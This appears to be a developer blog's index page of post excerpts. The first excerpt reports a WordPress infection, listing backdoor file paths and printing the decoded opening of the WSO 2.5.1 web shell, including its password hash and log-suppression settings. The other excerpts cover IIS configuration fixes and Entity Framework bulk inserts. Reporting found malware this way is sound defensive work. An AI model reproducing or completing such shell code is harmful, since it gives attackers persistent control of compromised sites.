WordPress massmailer malware and WSO 2.5.1 shell backdoor

Ok, I found a suspicious file on another website and it’s a shell backdoor. /wp-content/backup-2365b/.title14.php /wp-content/uploads/wysija/themes/rss.lib.php /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php this is original content: and And this is the unencrypted content: $auth_pass = "f4eeb83f67a86ea7baaaac13bebe6417"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5.1'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) {

06 Feb 2015

WordPress and multiple malwares

Thanks to MailPoet and Revolution Slider my websites run over multiple attaks. I noticed problems mainly because, when I enter in the plugins’ list, a lot of errors like “Plugin ABC deactivated..” come out. This because the plugin main file was not starting with its regular comment, but with the malevolent code. A lot of

05 Feb 2015

Install 32 bit Websites on Windows 2008 64 bit besides MS Exchange/Outlook

Every time I’m istalling a website on a Win 2008 64 bit server I’ve a lot of problem with MS Exchange and Outlook components. I think this tutorial might save a lot of time to a lot of people! Event log error message: The Module DLL C:\Windows\system32\RpcProxy\RpcProxy.dll failed to load. The data is the error.

17 Dec 2013

Fixing Corrupted applicationHost.config file in IIS 7 and IIS 7.5

Recently one of my clients applicationHost.config files became corrupted, it might my fault because I was editing that file with notepad, and something went wrong. Anyways IIS7 was erroring out with the error below when I tried to access the websites and application pools. So all websites and web applications were unavailable. The Windows Process

26 Nov 2013

Speed up Entity Framework large data inserting with SqlBulkCopy

As known Entity Framework is quite slow when inserting items and almost unusable when you are insertin 1000+ items. A very fast workaround is using SqlBulkCopy, it’s very fast and easy to use. public static void saveData<T>(ref List<T> list, string destinationTableName, int batchSize) { using (EntityDataReader<T> reader = new EntityDataReader<T>(list)) using (System.Data.SqlClient.SqlBulkCopy sbc = new

23 Jul 2013
theme by teslathemes